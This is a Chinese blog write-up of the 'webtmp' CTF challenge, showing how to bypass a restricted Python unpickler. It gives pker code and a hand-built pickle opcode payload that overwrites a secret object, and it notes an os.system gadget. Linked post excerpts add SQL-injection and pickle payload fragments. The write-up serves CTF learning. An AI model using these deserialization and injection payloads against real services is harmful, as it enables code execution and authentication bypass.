高校战疫网络安全分享赛: webtmp

最新推荐文章于 2023-04-19 16:41:16 发布
最新推荐文章于 2023-04-19 16:41:16 发布
阅读量2.8k 收藏
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122549074
版权

源码

打开后的页面

点击here可以看到源码,关键处代码

当满足Animal类中对象的name和category属性和secret内的两个属性的值吻合即可getflag

这里还限制了‘R',并且RestrictedUnpickler函数使得我们只能使用mian中模块。

 所以可以导入secret然后再覆盖secret变量的值

手写opcode有些困难,所以利用pker工具

pker代码放到1.txt中

secret=GLOBAL('__main__', 'secret') # python的执行文件被解析为__main__对象,secret在该对象从属下
secret.name='1'
secret.category='2'
animal = INST('__main__', 'Animal','1','2')
return animal



GLOBAL
对应opcode:b'c'
获取module下的一个全局对象(没有import的也可以,比如下面的os):
GLOBAL('os', 'system')
输入:module,instance(callable、module都是instance)  

INST
对应opcode:b'i'
建立并入栈一个对象(可以执行一个函数):
INST('os', 'system', 'ls')  
输入:module,callable,para

 利用脚本将\n还原为回车

a="c__main__\nsecret\np0\n0g0\n(}(S'name'\nS'1'\ndtbg0\n(}(S'category'\nS'2'\ndtb(S'1'\nS'2'\ni__main__\nAnimal\np3\n0g3\n."
a =a.encode('ascii').decode('unicode_escape')
print(a)

base64编码后提交即可获得flag

参考文章:
https://xz.aliyun.com/t/7436#toc-17 

Uzero.
关注
XCTF高校分享
12-22
sqlcheckin sql注入 https://blog.csdn.net/nzjdsds/article/details/82980041 直接看例子: like也是一样 false false 得到true,令username:xxx’=’,password:xxx’=’,payload: char(61)用来绕过= username=xxx’+char(61)+’&password=xxx’+char(61)+’ webtmp 源码 import base64 import io import sys import pickle from flask import
XCTF 高校网络安全分享 WEB_WP
qq_40648358的博客
03-10 2730
文章目录XCTF 高校网络安全分享easy_trick_gzmtuhackmefmkqPHP-UAFnwebsqlcheckin XCTF 高校网络安全分享 easy_trick_gzmtu 首先说一下这个题的脑洞确实强 打开题目后,是一个好看的博客,源码里提示?time=Y或者?time=2020 测试得存在盲注的,但是当构造payload的时候,一直是500,猜测是...
2020 高校网络安全分享 musl
yongbaoii的博客
06-25 834
因为2021 强网杯出了一道musl pwn,然后找到了这个题目,一起学习学习。 运行程序的话首先要装musl的驱动 没有开pie。 刚开始先申请空间。 空间是可读可写的。 assign 最多申请16个chunk,我们有一次溢出的机会。 destory 都清干净了。 transform 就改一下里面的内容。 examine 就是输出,但是只能有一次机会。 程序读完我们来看看musl libc的内容。 musl libc 是一个专门为嵌入式系统开发的轻量级 libc 库,以简单、轻量和高效率为特
高校网络安全分享 —— Write-up
a3320315的博客
03-30 2525
Guessgame 这道题目当时没做出来,后来复现的时候,发现挺有意思的,题目中主要有三个考点 JS的大小写特征 原型链污染 redos盲注 这儿主要着重介绍一下第三个考点 JS的 exec test RegExp match replace spite可以造成redos盲注 /([a-z]+)+$/.exec('aaaaaaaaaaaaaaaaaaaaaaaaaaaa!'); /Runoo...
高校网络安全分享Writeup——天津垓
qq_43557177的博客
03-10 935
拿到题目,发现由于缺少cygwin1.dll本机并没有办法运行,但是题还是要做的 直接拖进IDA里,进行分析,查找字符串 看起来是有点东西,双击其中一个 然后按住x查找引用 但是目测这个函数并不能帮到我们,继续对函数名称查找引用 进入第一个函数,有点东西了 大体逻辑是将字符串“Rising_Hopper!”作为key,v1到v18作为数组Number,遍历输入Str,满足一个简单逻辑,Pyt...
php x00x00x00x00x00x00rxdf,GXZYCTF部分Web Writeup
weixin_31290873的博客
03-17 2939
很长一段时间没有接触了,都沉迷于课程学习不能自拔(被迫的),果然2020年对题目都失去了感觉,不仅如此,刚打开就想x了......,简单先整理一下做出来的题。之后文章主要发在个人博客:Cyc1e's Blog0x00 Webtmp题目源码import base64import ioimport sysimport picklefrom flask import Flask, Response, r...
陇原2021网络安全 Web
feng的博客
11-08 5960
前言 题挺有意思的,Web有点难,而且后面三道难题放的有点晚了,时间不够(肝了一下午的Java)。这个比的难度,能早9晚9的话可能还好一些,早9晚5就有点紧了。 Java还是太菜了,需要学很多的东西。 eaaasyphp 反序列化链的构造很简单就不提了,正常构造写文件发现应该是不行的,目录应该不可写。给了个Hint类里面提示phpinfo,那打一下phpinfo看一下: class Bypass { public function __construct(){ $this->
2020新春网络安全公益部分web writeup
st0ut的博客
02-25 1798
前言 最近因为情,在家里都没怎么出门,正好i春秋平台举办了2020新春网络安全公益。学到了一些骚姿势,师傅们都tql了。。。 DAY1 简单的招聘系统 打开页面发现是一个登陆框,直接注册账号登陆进去。发现需要管理员登陆,才能解锁新功能。 在那里xss了半天,没有结果。。。。 最后重新回到登陆页面,使用万能密码登陆,发现能登进去,但是是我刚刚注册的账号,于是重新下发题目,,直接万能密码登陆,...
HDFS的web网页中点击tmp目录出现以下错误
Aplopyu的博客
12-03 1659
HDFS的web网页中点击tmp目录出现以下错误 Permission denied: user=dr.who, access=READ_EXECUTE, inode="/tmp":root:supergroup:drwx------ 解决方法: 输入这行代码,修改权限即可 参考网址:(14条消息) Hadoop 2.8.5 Permission denied: user=dr.who, access=READ_EXECUTE, inode=“/user:root问题解决_北京小辉-CSDN博客 ...
[网络安全] [MCollider] XCTF Confusion2 靶场详解 难度:10星
04-19 294
题目本身存在难度的,该题考了JWT和Python反序列化,其中分支就包含了python的经典类和新式类的知识点,官方给的WP资源少并且又过于难以理解,所以另一种方式刨析了一遍。
python pickle反序列化漏洞_python pickle从零构造反序列化攻击利用
weixin_39743414的博客
12-17 226
有一篇很好的文章对此讲的很详细https://xz.aliyun.com/t/7436#toc-0此外我对文章中的手写反序列化一块进行一些补充几道例题Code-Breaking:picklecode原payload:b'''cbuiltinsgetattrp0(cbuiltinsdictS'get'tRp1cbuiltinsglobals)Rp200g1(g2S'builtins'tRp30g0(...
XCTF高校网络安全分享(隐藏的信息)
hhh
03-14 1079
知识点: 双音多频(拨号音隐写) 二维码相关知识 解压完是一个残缺的二维码和一个压缩包。压缩包是加密的,所以我们先看二维码。 二维码很容易看出来需要反色+补上三个小黑块(用于位置探测)(讲真,我以前一直觉得二维码是个很特殊的东西,每一个二维码都是独一无二的,毕竟你看扫出来的东西都不一样嘛……) 这张图片缺少的是位置探测区,这三个小黑块用来确定二维码的大小和位置,帮助我们正确定位二维码里的数...
高校网络安全分享部分WP
qq_41252520的博客
03-10 1213
文章目录前言Reverse0x0 Cycle graph0x1 天津垓0x2 fxck!PWN0x0 easyheap0x1 woodenbox2 前言 这场团队,我个人进入状态很慢,第一天傍晚才开始做出一道题,这与本次比的题目质量也有关。这次比题目平均质量比I春秋公益要高。作为队伍中的一员,我个人仅贡献出了3道题的分数。另外有2道逆向题各有所惑,感觉只差那一步。后面也会说明一下,...
tmp目录下文件被删除
dolores_peng的博客
12-05 2639
描述:线上服务器tmp目录下有一目录用来接收部署系统发送的压缩文件并解压到运行目录,但是该目录多次消失导致部署报错 分析:想起来centos6系统中有tmpwatch文件配置tmp目录内容自动清除机制,查询发现centos7下改为systemd-tmpfiles-setup.service服务统一控制,其配置文件在/usr/lib/tmpfiles.d/tmp.conf v /tmp 1777
高校网络安全分享
辰星的博客
03-09 2941
2020情期间高校网络安全分享,个人做出的部分WP。不足之处见谅。 MISC 简单MISC 提示为简单隐写术。附件中一张jpg图片和一个名为flag.zip的加密压缩包,很明显是让我们利用jpg获得密码解压压缩包。 我们猜测这个图片中可能存在.txt文件保存密码,16进制查看器中查看下验证猜想。 在kali中利用binwalk分离出来,并查看 得到莫尔斯码,解码得到密码,解码压缩...
基于A*算法的往返式全覆盖路径规划改进及其Matlab实现
04-09
内容概要:本文详细介绍了如何利用A*算法改进传统的往返式路径规划,解决扫地机器人在复杂环境中容易卡住的问题。首先构建了一个可视化的栅格地图用于模拟环境,然后引入了优先级运动规则,使机器人能够有规律地进行往返清扫。当遇到死角时,通过A*算法计算最佳逃生路径,确保机器人能够顺利脱困并继续完成清扫任务。实验结果显示,改进后的算法显著提高了清洁覆盖率,降低了路径重复率。此外,还讨论了一些潜在的优化方向,如动态调整启发函数权重、断点续传以及能耗模型等。 适合人群:对路径规划算法感兴趣的科研人员、自动化专业学生、扫地机器人开发者。 使用场景及目标:适用于需要高覆盖率和低重复率的室内清洁任务,旨在提高扫地机器人的工作效率和智能化水平。 其他说明:文中提供了详细的Matlab代码实现,并附带了仿真测试结果,有助于读者理解和复现该算法。
爬取喜马拉雅听书(1).py
04-09
爬取喜马拉雅听书(1)
安卓向上传递数据学习笔记总结
最新发布
04-09
安卓向上传递数据学习笔记总结
tigervnc-selinux-1.11.0-9.el8.x64-86.rpm.tar.gz
04-09
1、文件说明: Centos8操作系统tigervnc-selinux-1.11.0-9.el8.rpm以及相关依赖,全打包为一个tar.gz压缩包 2、安装指令: #Step1、解压 tar -zxvf tigervnc-selinux-1.11.0-9.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值